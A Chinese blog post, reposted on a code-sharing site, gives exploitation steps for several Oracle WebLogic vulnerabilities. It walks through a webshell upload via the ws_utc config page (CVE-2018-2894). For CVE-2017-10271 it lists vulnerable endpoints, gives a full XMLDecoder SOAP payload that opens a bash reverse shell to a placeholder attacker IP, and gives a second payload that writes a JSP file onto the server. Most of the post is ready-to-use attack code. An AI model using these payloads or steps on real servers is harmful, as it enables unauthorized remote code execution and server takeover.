码迷,mamicode.com
首页 > Web开发 > 详细

Weblogic漏洞利用

时间:2020-05-02 16:49:16      阅读:89      评论:0      收藏:0      [点我收藏+]

标签:home   win64   server   执行   wls   ade   语句   jsp   x11   

Weblogic漏洞

Weblogic任意文件上传(CVE-2018-2894)

受影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

漏洞存在前提
后台base_domain设置中启用web服务测试页
技术图片

利用漏洞方法

  1. 访问
http://xxx.com/ws_utc/config.do
  1. 设置Work Home Dir为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,然后提交。
技术图片

  1. 点击"安全",添加,弹出登录框,点击“浏览”上传webshell并抓包
    技术图片

  2. 找到响应包中的时间戳
    技术图片

访问http://xxx.com/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

Weblogic反序列化 (CVE-2017-10271)

受影响版本

10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0
  1. 初步漏洞判断
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

技术图片

  1. 反弹shell (发送数据xml时,反弹shell语句,要进行编码。)
    payload:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.74.154:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/hAccept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 639


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/接收shell的ip/1234 0&gt;&amp;1</string> 
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
  1. 写入shell
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

访问写入文件:
技术图片

WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)

https://blog.csdn.net/csacs/article/details/87122472

Weblogic漏洞利用

标签:home   win64   server   执行   wls   ade   语句   jsp   x11   

原文地址:https://www.cnblogs.com/zane-s/p/12818357.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!